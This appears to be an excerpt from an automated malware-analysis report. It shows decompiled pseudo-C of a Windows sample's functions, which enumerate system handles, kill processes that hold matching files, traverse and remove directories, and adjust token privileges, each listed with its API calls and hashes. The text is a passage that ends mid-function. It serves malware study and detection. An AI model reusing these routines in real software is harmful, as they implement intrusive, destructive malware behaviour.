                                                                                        • String ID:
                                                                                        • API String ID: 2293617046-0
                                                                                        • Opcode ID: 2030e8a2f2f4273e8b4111c207a00a0d2bd4d3997f06d320612747033885a0fa
                                                                                        • Instruction ID: 05a33972e397d168fdc4487f25c2144293a10a829dda077af1d2e93b1e0dd51b
                                                                                        • Opcode Fuzzy Hash: 2030e8a2f2f4273e8b4111c207a00a0d2bd4d3997f06d320612747033885a0fa
                                                                                        • Instruction Fuzzy Hash: 0A31BA72900608FFDB208F90ED45BAEBB71FB04314F10887AE515B26A0E7365A1A9F48
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 87%
                                                                                        			E00405756(void* __ebx) {
                                                                                        				long _t60;
                                                                                        				void* _t64;
                                                                                        				long _t65;
                                                                                        				intOrPtr* _t71;
                                                                                        				WCHAR* _t85;
                                                                                        				void* _t86;
                                                                                        				void* _t101;
                                                                                        				intOrPtr _t105;
                                                                                        				void* _t110;
                                                                                        				void* _t113;
                                                                                        				void* _t115;
                                                                                        				void* _t118;
                                                                                        				void* _t121;
                                                                                        
                                                                                        				_t101 = __ebx;
                                                                                        				while(1) {
                                                                                        					_t60 = NtQuerySystemInformation(0x10,  *(_t115 - 0x24),  *(_t115 - 0x28), _t115 - 0x28);
                                                                                        					if(_t60 == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					if(_t60 != 0xc0000004) {
                                                                                        						RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x24));
                                                                                        						return  *((intOrPtr*)(_t115 - 4));
                                                                                        					} else {
                                                                                        						 *(_t115 - 0x24) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t115 - 0x24),  *(_t115 - 0x28));
                                                                                        						continue;
                                                                                        					}
                                                                                        					L35:
                                                                                        				}
                                                                                        				_t64 = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
                                                                                        				 *(_t115 - 0x1c) = _t64;
                                                                                        				_t113 =  *(_t115 - 0x24);
                                                                                        				asm("lodsd");
                                                                                        				_t110 = _t64;
                                                                                        				 *(_t115 - 8) = 0;
                                                                                        				do {
                                                                                        					_t105 =  *((intOrPtr*)(_t115 - 0xc));
                                                                                        					_t65 =  *(_t115 - 8);
                                                                                        					if( *((intOrPtr*)(_t113 + 4)) != _t101 ||  *_t113 <= 4 ||  *_t113 == _t65 ||  *_t113 == _t105) {
                                                                                        						goto L27;
                                                                                        					} else {
                                                                                        						 *(_t115 - 0x10) = 0;
                                                                                        						 *(_t115 - 0x30) =  *_t113;
                                                                                        						 *(_t115 - 0x2c) = 0;
                                                                                        						_t71 = _t115 - 0x48;
                                                                                        						 *_t71 = 0x18;
                                                                                        						 *(_t71 + 4) = 0;
                                                                                        						 *(_t71 + 8) = 0;
                                                                                        						 *(_t71 + 0xc) = 0;
                                                                                        						 *(_t71 + 0x10) = 0;
                                                                                        						 *(_t71 + 0x14) = 0;
                                                                                        						if(NtOpenProcess(_t115 - 0x10, 0x100441, _t115 - 0x48, _t115 - 0x30) == 0) {
                                                                                        							if(NtDuplicateObject( *(_t115 - 0x10),  *(_t113 + 6) & 0x0000ffff, 0xffffffff, _t115 - 0x14, 0, 0, 2) == 0) {
                                                                                        								if(E004054E0( *(_t115 - 0x14),  *(_t115 - 0x1c)) != 0) {
                                                                                        									memset( *(_t115 - 0x1c), 0, 0x10000);
                                                                                        									_t118 = _t118 + 0xc;
                                                                                        									goto L25;
                                                                                        								} else {
                                                                                        									_t85 = PathFindFileNameW( *(_t115 - 0x1c) + 4);
                                                                                        									_t86 =  *0x40f694(_t85,  *((intOrPtr*)(_t115 - 0x18)));
                                                                                        									_t121 = _t118 + 8;
                                                                                        									if(_t86 != 0) {
                                                                                        										memset( *(_t115 - 0x1c), 0, 0x10000);
                                                                                        										_t118 = _t121 + 0xc;
                                                                                        										L25:
                                                                                        										NtClose( *(_t115 - 0x14));
                                                                                        										goto L26;
                                                                                        									} else {
                                                                                        										 *(_t115 - 0x20) = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
                                                                                        										if(NtQueryInformationProcess( *(_t115 - 0x10), 0x1b,  *(_t115 - 0x20), 0x10000, _t115 - 0x28) == 0) {
                                                                                        											if(E0040567D(PathFindFileNameW( *( *(_t115 - 0x20) + 4))) == 0) {
                                                                                        												 *0x40f708( *(_t115 - 0x10), 0);
                                                                                        												WaitForSingleObject( *(_t115 - 0x10), 0xffffffff);
                                                                                        												 *((intOrPtr*)(_t115 - 4)) = 1;
                                                                                        											}
                                                                                        											NtClose( *(_t115 - 0x14));
                                                                                        											NtClose( *(_t115 - 0x10));
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							} else {
                                                                                        								 *(_t115 - 8) =  *_t113;
                                                                                        								L26:
                                                                                        								NtClose( *(_t115 - 0x10));
                                                                                        								goto L27;
                                                                                        							}
                                                                                        						} else {
                                                                                        							 *(_t115 - 8) =  *_t113;
                                                                                        							goto L27;
                                                                                        						}
                                                                                        					}
                                                                                        					break;
                                                                                        					L27:
                                                                                        					_t113 = _t113 + 0x10;
                                                                                        					_t110 = _t110 - 1;
                                                                                        				} while (_t110 != 0);
                                                                                        				if( *(_t115 - 0x24) != 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x24));
                                                                                        				}
                                                                                        				if( *(_t115 - 0x1c) != 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x1c));
                                                                                        				}
                                                                                        				if( *(_t115 - 0x20) != 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x20));
                                                                                        				}
                                                                                        				return  *((intOrPtr*)(_t115 - 4));
                                                                                        				goto L35;
                                                                                        			}

                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000000,00000400,00000400), ref: 0040574A
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,00000400), ref: 0040576D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00010000), ref: 004057A8
                                                                                        • NtOpenProcess.NTDLL(00000000,00100441,?,?), ref: 00405836
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00405975
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040598C
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004059A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate$InformationOpenProcessQuerySystem
                                                                                        • String ID:
                                                                                        • API String ID: 1274054332-0
                                                                                        • Opcode ID: 323bf974465820a9ca4684000b3f9fe8afd21da4940bf57cebcfedbd9dae2718
                                                                                        • Instruction ID: aef76e67c4994cf3bea6b660a8da59467be58e7d1027b6c966269403f1c264c7
                                                                                        • Opcode Fuzzy Hash: 323bf974465820a9ca4684000b3f9fe8afd21da4940bf57cebcfedbd9dae2718
                                                                                        • Instruction Fuzzy Hash: 19313871900609EFDB21CF90DD08BAEBBB4FB08310F24447AE540B72A0D77A9949DF59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 87%
                                                                                        			E00405778(void* __ebx) {
                                                                                        				long _t60;
                                                                                        				void* _t64;
                                                                                        				long _t65;
                                                                                        				intOrPtr* _t71;
                                                                                        				WCHAR* _t85;
                                                                                        				void* _t86;
                                                                                        				void* _t101;
                                                                                        				intOrPtr _t105;
                                                                                        				void* _t110;
                                                                                        				void* _t113;
                                                                                        				void* _t115;
                                                                                        				void* _t118;
                                                                                        				void* _t121;
                                                                                        
                                                                                        				_t101 = __ebx;
                                                                                        				while(1) {
                                                                                        					_t60 = NtQuerySystemInformation(0x10,  *(_t115 - 0x24),  *(_t115 - 0x28), _t115 - 0x28);
                                                                                        					if(_t60 == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					if(_t60 != 0xc0000004) {
                                                                                        						RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x24));
                                                                                        						return  *((intOrPtr*)(_t115 - 4));
                                                                                        					} else {
                                                                                        						 *(_t115 - 0x24) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t115 - 0x24),  *(_t115 - 0x28));
                                                                                        						continue;
                                                                                        					}
                                                                                        					L35:
                                                                                        				}
                                                                                        				_t64 = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
                                                                                        				 *(_t115 - 0x1c) = _t64;
                                                                                        				_t113 =  *(_t115 - 0x24);
                                                                                        				asm("lodsd");
                                                                                        				_t110 = _t64;
                                                                                        				 *(_t115 - 8) = 0;
                                                                                        				do {
                                                                                        					_t105 =  *((intOrPtr*)(_t115 - 0xc));
                                                                                        					_t65 =  *(_t115 - 8);
                                                                                        					if( *((intOrPtr*)(_t113 + 4)) != _t101 ||  *_t113 <= 4 ||  *_t113 == _t65 ||  *_t113 == _t105) {
                                                                                        						goto L27;
                                                                                        					} else {
                                                                                        						 *(_t115 - 0x10) = 0;
                                                                                        						 *(_t115 - 0x30) =  *_t113;
                                                                                        						 *(_t115 - 0x2c) = 0;
                                                                                        						_t71 = _t115 - 0x48;
                                                                                        						 *_t71 = 0x18;
                                                                                        						 *(_t71 + 4) = 0;
                                                                                        						 *(_t71 + 8) = 0;
                                                                                        						 *(_t71 + 0xc) = 0;
                                                                                        						 *(_t71 + 0x10) = 0;
                                                                                        						 *(_t71 + 0x14) = 0;
                                                                                        						if(NtOpenProcess(_t115 - 0x10, 0x100441, _t115 - 0x48, _t115 - 0x30) == 0) {
                                                                                        							if(NtDuplicateObject( *(_t115 - 0x10),  *(_t113 + 6) & 0x0000ffff, 0xffffffff, _t115 - 0x14, 0, 0, 2) == 0) {
                                                                                        								if(E004054E0( *(_t115 - 0x14),  *(_t115 - 0x1c)) != 0) {
                                                                                        									memset( *(_t115 - 0x1c), 0, 0x10000);
                                                                                        									_t118 = _t118 + 0xc;
                                                                                        									goto L25;
                                                                                        								} else {
                                                                                        									_t85 = PathFindFileNameW( *(_t115 - 0x1c) + 4);
                                                                                        									_t86 =  *0x40f694(_t85,  *((intOrPtr*)(_t115 - 0x18)));
                                                                                        									_t121 = _t118 + 8;
                                                                                        									if(_t86 != 0) {
                                                                                        										memset( *(_t115 - 0x1c), 0, 0x10000);
                                                                                        										_t118 = _t121 + 0xc;
                                                                                        										L25:
                                                                                        										NtClose( *(_t115 - 0x14));
                                                                                        										goto L26;
                                                                                        									} else {
                                                                                        										 *(_t115 - 0x20) = RtlAllocateHeap( *0x40f5d6, 8, 0x10000);
                                                                                        										if(NtQueryInformationProcess( *(_t115 - 0x10), 0x1b,  *(_t115 - 0x20), 0x10000, _t115 - 0x28) == 0) {
                                                                                        											if(E0040567D(PathFindFileNameW( *( *(_t115 - 0x20) + 4))) == 0) {
                                                                                        												 *0x40f708( *(_t115 - 0x10), 0);
                                                                                        												WaitForSingleObject( *(_t115 - 0x10), 0xffffffff);
                                                                                        												 *((intOrPtr*)(_t115 - 4)) = 1;
                                                                                        											}
                                                                                        											NtClose( *(_t115 - 0x14));
                                                                                        											NtClose( *(_t115 - 0x10));
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							} else {
                                                                                        								 *(_t115 - 8) =  *_t113;
                                                                                        								L26:
                                                                                        								NtClose( *(_t115 - 0x10));
                                                                                        								goto L27;
                                                                                        							}
                                                                                        						} else {
                                                                                        							 *(_t115 - 8) =  *_t113;
                                                                                        							goto L27;
                                                                                        						}
                                                                                        					}
                                                                                        					break;
                                                                                        					L27:
                                                                                        					_t113 = _t113 + 0x10;
                                                                                        					_t110 = _t110 - 1;
                                                                                        				} while (_t110 != 0);
                                                                                        				if( *(_t115 - 0x24) != 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x24));
                                                                                        				}
                                                                                        				if( *(_t115 - 0x1c) != 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x1c));
                                                                                        				}
                                                                                        				if( *(_t115 - 0x20) != 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0,  *(_t115 - 0x20));
                                                                                        				}
                                                                                        				return  *((intOrPtr*)(_t115 - 4));
                                                                                        				goto L35;
                                                                                        			}

                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000000,00000400,00000400), ref: 0040574A
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,00000400), ref: 0040576D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00010000), ref: 004057A8
                                                                                        • NtOpenProcess.NTDLL(00000000,00100441,?,?), ref: 00405836
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00405975
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040598C
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004059A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate$InformationOpenProcessQuerySystem
                                                                                        • String ID:
                                                                                        • API String ID: 1274054332-0
                                                                                        • Opcode ID: 1967e6ece01a1961eee519764137e8cdfb7db098ec689b9e308a36bbac97e9d0
                                                                                        • Instruction ID: aef76e67c4994cf3bea6b660a8da59467be58e7d1027b6c966269403f1c264c7
                                                                                        • Opcode Fuzzy Hash: 1967e6ece01a1961eee519764137e8cdfb7db098ec689b9e308a36bbac97e9d0
                                                                                        • Instruction Fuzzy Hash: 19313871900609EFDB21CF90DD08BAEBBB4FB08310F24447AE540B72A0D77A9949DF59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00403EDD(wchar_t* _a4) {
                                                                                        				void* _v8;
                                                                                        				char _v12;
                                                                                        				long _v532;
                                                                                        				struct _WIN32_FIND_DATAW _v1124;
                                                                                        				void* _t22;
                                                                                        				wchar_t* _t25;
                                                                                        				void* _t41;
                                                                                        				void* _t42;
                                                                                        
                                                                                        				_t22 = E00403FBA(_a4,  &_v532);
                                                                                        				if(_t22 != 0) {
                                                                                        					E00401A3A( &_v532);
                                                                                        					_t25 =  &_v12;
                                                                                        					 *_t25 = 0x2d0053;
                                                                                        					_t25[1] = 0x2a;
                                                                                        					wcscat( &_v532, _t25);
                                                                                        					_t42 = _t41 + 8;
                                                                                        					_t22 = FindFirstFileExW( &_v532, 0,  &_v1124, 0, 0, 0);
                                                                                        					_v8 = _t22;
                                                                                        					if(_v8 != 0xffffffff) {
                                                                                        						do {
                                                                                        							if((_v1124.dwFileAttributes & 0x00000010) != 0) {
                                                                                        								wcscpy( &((wcsrchr( &_v532, 0x5c))[0]),  &(_v1124.cFileName));
                                                                                        								_t42 = _t42 + 0x10;
                                                                                        								E0040409F( &_v532);
                                                                                        							}
                                                                                        						} while (FindNextFileW(_v8,  &_v1124) != 0);
                                                                                        						return FindClose(_v8);
                                                                                        					}
                                                                                        				}
                                                                                        				return _t22;
                                                                                        			}

                                                                                        APIs
                                                                                          • Part of subcall function 00403FBA: wcscpy.NTDLL ref: 00403FD9
                                                                                          • Part of subcall function 00403FBA: wcscat.NTDLL ref: 0040400F
                                                                                          • Part of subcall function 00403FBA: FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0040402E
                                                                                          • Part of subcall function 00403FBA: wcscpy.NTDLL ref: 0040404F
                                                                                          • Part of subcall function 00403FBA: wcscat.NTDLL ref: 00404062
                                                                                          • Part of subcall function 00403FBA: FindClose.KERNEL32(000000FF), ref: 0040408B
                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 00403F26
                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00403F45
                                                                                        • wcsrchr.NTDLL ref: 00403F69
                                                                                        • wcscpy.NTDLL ref: 00403F7D
                                                                                          • Part of subcall function 0040409F: wcslen.NTDLL ref: 004040BE
                                                                                          • Part of subcall function 0040409F: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 004040DF
                                                                                          • Part of subcall function 0040409F: wcscpy.NTDLL ref: 004040F8
                                                                                          • Part of subcall function 0040409F: wcscat.NTDLL ref: 00404117
                                                                                          • Part of subcall function 0040409F: FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00404132
                                                                                          • Part of subcall function 0040409F: wcslen.NTDLL ref: 00404161
                                                                                          • Part of subcall function 0040409F: wcslen.NTDLL ref: 0040416F
                                                                                          • Part of subcall function 0040409F: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 0040418A
                                                                                          • Part of subcall function 0040409F: wcscpy.NTDLL ref: 004041A3
                                                                                          • Part of subcall function 0040409F: wcsrchr.NTDLL ref: 004041B1
                                                                                          • Part of subcall function 0040409F: wcscpy.NTDLL ref: 004041C2
                                                                                          • Part of subcall function 0040409F: GetFileAttributesW.KERNEL32(00000000), ref: 004041CE
                                                                                          • Part of subcall function 0040409F: RemoveDirectoryW.KERNEL32(00000000,00000000), ref: 004041F2
                                                                                          • Part of subcall function 0040409F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404203
                                                                                        • FindNextFileW.KERNEL32(000000FF,?,?,00000000), ref: 00403F9C
                                                                                        • FindClose.KERNEL32(000000FF,?,00000000), ref: 00403FA9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Findwcscpy$File$wcscatwcslen$FirstHeap$AllocateClosewcsrchr$AttributesDirectoryFreeNextRemove
                                                                                        • String ID:
                                                                                        • API String ID: 605736639-0
                                                                                        • Opcode ID: 5c71c00abe015d81086f7918051314c0ae688f358dcbfe31925b72272ac79de5
                                                                                        • Instruction ID: d99c8b8c5bf66cacb51d49b1237038c82d90471e11b7a8205135aa6531c62d14
                                                                                        • Opcode Fuzzy Hash: 5c71c00abe015d81086f7918051314c0ae688f358dcbfe31925b72272ac79de5
                                                                                        • Instruction Fuzzy Hash: FA213DB190021CAFDB20DF90DD49FEAB7BCEB04305F4444BAB608E2190E7759B598B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000008,?), ref: 004020BD
                                                                                        • NtQueryInformationToken.NTDLL(?,00000002,?,00000004,?), ref: 004020DA
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?), ref: 004020EB
                                                                                        • NtQueryInformationToken.NTDLL(?,00000002,00000000,?,?), ref: 00402109
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402145
                                                                                        • NtClose.NTDLL(?), ref: 0040214E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Token$HeapInformationQuery$AllocateCloseFreeOpenProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2834467292-0
                                                                                        • Opcode ID: 64bf4633e7434abd1c7c6cd6f404db9bb5d718fa07b42b3c983a399241729110
                                                                                        • Instruction ID: 198f46a11d177ab6c43c5cd4ef28576361b4b60eaf87f4fdacca15c80edfd62e
                                                                                        • Opcode Fuzzy Hash: 64bf4633e7434abd1c7c6cd6f404db9bb5d718fa07b42b3c983a399241729110
                                                                                        • Instruction Fuzzy Hash: D2213872900209BFEB209F90DD49BAEBBB9FB14321F404576E620B61E0D7B25A498B54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00403332
                                                                                        • NtQueryInformationToken.NTDLL(00000000,00000001,?,00000028,0040D051), ref: 0040334E
                                                                                        • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00403363
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403396
                                                                                        • NtClose.NTDLL(00000000), ref: 004033A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Token$CloseConvertFreeHeapInformationOpenProcessQueryString
                                                                                        • String ID:
                                                                                        • API String ID: 2116111113-0
                                                                                        • Opcode ID: de29dab458cdd23e3370c7ec52759eea74b706aedef0ea8dced3d09f10d4c8b4
                                                                                        • Instruction ID: fb7abfd45a6aa92f458a8256b14b969b6b9d919c01c3cc4abf3ca5e85aa21afc
                                                                                        • Opcode Fuzzy Hash: de29dab458cdd23e3370c7ec52759eea74b706aedef0ea8dced3d09f10d4c8b4
                                                                                        • Instruction Fuzzy Hash: 54212971500209AFEB20DF90DD88BAEBB7CFB00316F10413AE910B11E0DB765A499B59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 87%
                                                                                        			E00408F5B(void* __eflags, intOrPtr _a4, WCHAR* _a8) {
                                                                                        				char _v28;
                                                                                        				short _v92;
                                                                                        				void* _t17;
                                                                                        				intOrPtr* _t18;
                                                                                        				void* _t24;
                                                                                        				void* _t28;
                                                                                        				void _t29;
                                                                                        				intOrPtr _t30;
                                                                                        				intOrPtr _t31;
                                                                                        				intOrPtr _t32;
                                                                                        
                                                                                        				E00402160();
                                                                                        				E004022D9(3);
                                                                                        				if( *0x40f5a1 != 0) {
                                                                                        					E0040314C(0x40f610);
                                                                                        				}
                                                                                        				_t17 = E004069E1(_a8);
                                                                                        				if( *0x40f5a5 != 0) {
                                                                                        					_t18 =  &_v28;
                                                                                        					 *_t18 = 0x6f004c;
                                                                                        					 *((intOrPtr*)(_t18 + 4)) = 0x610063;
                                                                                        					 *((intOrPtr*)(_t18 + 8)) = 0x5c006c;
                                                                                        					 *((intOrPtr*)(_t18 + 0xc)) = 0x730025;
                                                                                        					 *((intOrPtr*)(_t18 + 0x10)) = 0x25002d;
                                                                                        					 *((intOrPtr*)(_t18 + 0x14)) = 0x75;
                                                                                        					 *0x40f69c( &_v92,  &_v28, _a4, GetProcessId(0xffffffff));
                                                                                        					_t17 = OpenFileMappingW(0xf001f, 0,  &_v92);
                                                                                        					_t28 = _t17;
                                                                                        					if(_t28 != 0) {
                                                                                        						_t24 = MapViewOfFile(_t28, 0xf001f, 0, 0, 0x10);
                                                                                        						if(_t24 != 0) {
                                                                                        							_t29 =  *0x40f638; // 0x0
                                                                                        							 *_t24 = _t29;
                                                                                        							_t30 =  *0x40f644; // 0x0
                                                                                        							 *((intOrPtr*)(_t24 + 4)) = _t30;
                                                                                        							_t31 =  *0x40f63c; // 0x0
                                                                                        							 *((intOrPtr*)(_t24 + 8)) = _t31;
                                                                                        							_t32 =  *0x40f640; // 0x0
                                                                                        							 *((intOrPtr*)(_t24 + 0xc)) = _t32;
                                                                                        							UnmapViewOfFile(_t24);
                                                                                        						}
                                                                                        						return NtClose(_t28);
                                                                                        					}
                                                                                        				}
                                                                                        				return _t17;
                                                                                        			}

                                                                                        APIs
                                                                                          • Part of subcall function 00402160: NtOpenProcessToken.NTDLL(000000FF,00000028,0040905C), ref: 00402173
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,?,00000004,?), ref: 00402190
                                                                                          • Part of subcall function 00402160: RtlAllocateHeap.NTDLL(00000008,?), ref: 004021A1
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,00000000,?,?), ref: 004021BF
                                                                                          • Part of subcall function 00402160: NtAdjustPrivilegesToken.NTDLL(0040905C,00000000,00000000,00000000,00000000,00000000), ref: 004021F2
                                                                                          • Part of subcall function 00402160: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402203
                                                                                          • Part of subcall function 00402160: NtClose.NTDLL(0040905C), ref: 0040220C
                                                                                          • Part of subcall function 004022D9: NtSetInformationProcess.NTDLL(000000FF,00000012,0040F94C,00000002), ref: 004022FB
                                                                                          • Part of subcall function 004022D9: NtSetInformationProcess.NTDLL(000000FF,00000021,0040F94C,00000004), ref: 00402313
                                                                                        • GetProcessId.KERNEL32(000000FF,004091A8,00000003), ref: 00408FC3
                                                                                        • _swprintf.NTDLL ref: 00408FD5
                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,?), ref: 00408FE9
                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000010), ref: 00409001
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040902F
                                                                                        • NtClose.NTDLL(00000000), ref: 00409036
                                                                                          • Part of subcall function 0040314C: _swprintf.NTDLL ref: 00403169
                                                                                          • Part of subcall function 0040314C: RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040317B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: InformationProcessToken$FileHeap$CloseFreeOpenQueryView_swprintf$AdjustAllocateMappingPrivilegesUnmap
                                                                                        • String ID:
                                                                                        • API String ID: 1024850670-0
                                                                                        • Opcode ID: 23b2a1f9fa450f91b3f18fdd9abcc66c2088ca41bfc71efe00d791b6fabff58a
                                                                                        • Instruction ID: f833de01ad95f0be796b816ea4045ca79d195bf543ba841e9b2867f781130cdd
                                                                                        • Opcode Fuzzy Hash: 23b2a1f9fa450f91b3f18fdd9abcc66c2088ca41bfc71efe00d791b6fabff58a
                                                                                        • Instruction Fuzzy Hash: 7F2162B0500304AFD7249F90DD4DF667BA8EB04304F05857ABA05BB6F2DBB99849CB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 84%
                                                                                        			E004048D8() {
                                                                                        				long _t28;
                                                                                        				void* _t41;
                                                                                        				intOrPtr* _t45;
                                                                                        				void _t51;
                                                                                        				void* _t53;
                                                                                        
                                                                                        				while(1) {
                                                                                        					_t28 = NtQuerySystemInformation(5,  *(_t53 - 0xc),  *(_t53 - 8), _t53 - 8);
                                                                                        					if(_t28 == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					if(_t28 != 0xc0000004) {
                                                                                        						return RtlFreeHeap( *0x40f5d6, 0,  *(_t53 - 0xc));
                                                                                        					} else {
                                                                                        						 *(_t53 - 0xc) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t53 - 0xc),  *(_t53 - 8));
                                                                                        						continue;
                                                                                        					}
                                                                                        					L14:
                                                                                        				}
                                                                                        				_t41 =  *(_t53 - 0xc);
                                                                                        				do {
                                                                                        					_t51 =  *_t41;
                                                                                        					if( *((intOrPtr*)(_t41 + 0x3c)) != 0 && E00404993( *((intOrPtr*)(_t41 + 0x3c))) != 0) {
                                                                                        						 *(_t53 - 0x14) =  *((intOrPtr*)(_t41 + 0x44));
